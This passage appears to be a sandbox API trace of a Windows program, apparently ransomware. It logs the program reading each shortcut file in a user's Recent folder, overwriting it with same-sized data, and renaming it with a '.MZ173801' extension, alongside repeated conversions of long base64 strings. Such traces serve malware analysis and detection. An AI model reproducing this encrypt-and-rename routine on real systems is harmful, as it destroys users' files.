lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.063] GetCurrentThreadId () returned 0x1358 [0111.063] GetCurrentThreadId () returned 0x1358 [0111.063] GetCurrentThreadId () returned 0x1358 [0111.063] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rAI6kR Z24Gt07MNyb.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rai6kr z24gt07mnyb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.063] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.063] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.063] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x540 [0111.063] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.063] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x540, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x540, lpOverlapped=0x0) returned 1 [0111.064] CloseHandle (hObject=0x3f4) returned 1 [0111.064] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rAI6kR Z24Gt07MNyb.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rai6kr z24gt07mnyb.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.065] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x540, lpOverlapped=0x0) returned 1 [0111.066] CloseHandle (hObject=0x3f4) returned 1 [0111.067] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rAI6kR Z24Gt07MNyb.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rai6kr z24gt07mnyb.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rAI6kR Z24Gt07MNyb.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rai6kr z24gt07mnyb.lnk.mz173801")) returned 1 [0111.067] GetCurrentThreadId () returned 0x1358 [0111.067] GetCurrentThreadId () returned 0x1358 [0111.067] GetCurrentThreadId () returned 0x1358 [0111.067] GetCurrentThreadId () returned 0x1358 [0111.068] GetCurrentThreadId () returned 0x1358 [0111.068] GetCurrentThreadId () returned 0x1358 [0111.068] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb223935, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb223935, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb223935, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3fe, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="rGR73UL0vv 5tipQ0.lnk", cAlternateFileName="RGR73U~1.LNK")) returned 1 [0111.068] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.068] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.068] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rGR73UL0vv 5tipQ0.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rgr73ul0vv 5tipq0.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb223935, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb223935, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb223935, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3fe)) returned 1 [0111.068] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.068] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.068] GetCurrentThreadId () returned 0x1358 [0111.068] GetCurrentThreadId () returned 0x1358 [0111.069] GetCurrentThreadId () returned 0x1358 [0111.069] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.069] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.069] GetCurrentThreadId () returned 0x1358 [0111.069] GetCurrentThreadId () returned 0x1358 [0111.069] GetCurrentThreadId () returned 0x1358 [0111.069] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rGR73UL0vv 5tipQ0.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rgr73ul0vv 5tipq0.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.069] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.069] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.070] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3fe [0111.070] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.070] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3fe, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3fe, lpOverlapped=0x0) returned 1 [0111.070] CloseHandle (hObject=0x3f4) returned 1 [0111.071] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rGR73UL0vv 5tipQ0.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rgr73ul0vv 5tipq0.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.071] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3fe, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3fe, lpOverlapped=0x0) returned 1 [0111.072] CloseHandle (hObject=0x3f4) returned 1 [0111.073] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rGR73UL0vv 5tipQ0.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rgr73ul0vv 5tipq0.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rGR73UL0vv 5tipQ0.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rgr73ul0vv 5tipq0.lnk.mz173801")) returned 1 [0111.074] GetCurrentThreadId () returned 0x1358 [0111.074] GetCurrentThreadId () returned 0x1358 [0111.074] GetCurrentThreadId () returned 0x1358 [0111.074] GetCurrentThreadId () returned 0x1358 [0111.074] GetCurrentThreadId () returned 0x1358 [0111.074] GetCurrentThreadId () returned 0x1358 [0111.074] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea579204, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea579204, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea579204, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x277, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="RHvCNbn.lnk", cAlternateFileName="")) returned 1 [0111.074] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.074] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.074] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RHvCNbn.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rhvcnbn.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea579204, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea579204, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea579204, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x277)) returned 1 [0111.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.075] GetCurrentThreadId () returned 0x1358 [0111.075] GetCurrentThreadId () returned 0x1358 [0111.076] GetCurrentThreadId () returned 0x1358 [0111.076] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 